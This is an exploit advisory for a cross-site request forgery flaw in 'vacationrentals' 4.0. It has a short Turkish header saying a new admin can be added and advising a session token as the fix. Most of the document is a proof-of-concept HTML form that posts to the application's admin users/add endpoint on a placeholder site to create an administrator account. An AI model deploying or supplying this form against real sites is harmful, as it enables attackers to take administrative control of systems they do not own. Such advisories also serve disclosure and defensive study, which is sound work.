< ------------------- header data start ------------------- >

#############################################################

# Application Name : vacationrentals

# Version : 4.0

# vulnerable Type : XSRF

# Infection : Yeni Bir Admin Eklenebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli

# author : CWH1RLPOOL ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >
<form id=http://www.site.com/[path]/admin/users_add method=post action=http://www.site.com/[path]/admin/users/add enctype=multipart/form-data>
<input type=hidden name=profile_logo id=profile_logo value= />
<input class=text type=text id=user_name name=user_name value= />
<input class=text type=text id=email name=email value= />
<input class=text type=password id=password name=password />
<input class=text type=password id=retype_password name=retype_password />
<input class=text type=text id=profile_full_name name=profile_full_name value= />
<input class=text type=text id=profile_phone1 name=profile_phone1 value= />
<input class=text type=text id=profile_phone2 name=profile_phone2 value= />
<input class=text type=text id=profile_fax name=profile_fax value= />
<input class=text type=text id=profile_spoken_languages name=profile_spoken_languages value= />
<input class=text type=text id=profile_web_address name=profile_web_address value= />
<input type=file id=profile_logo_upload name=profile_logo_upload />
<input class=btn-orange type=submit value=Add user id=submit name=submit /><div class=btn-orange-end> </div>
</form>
< -- bug code end of -- >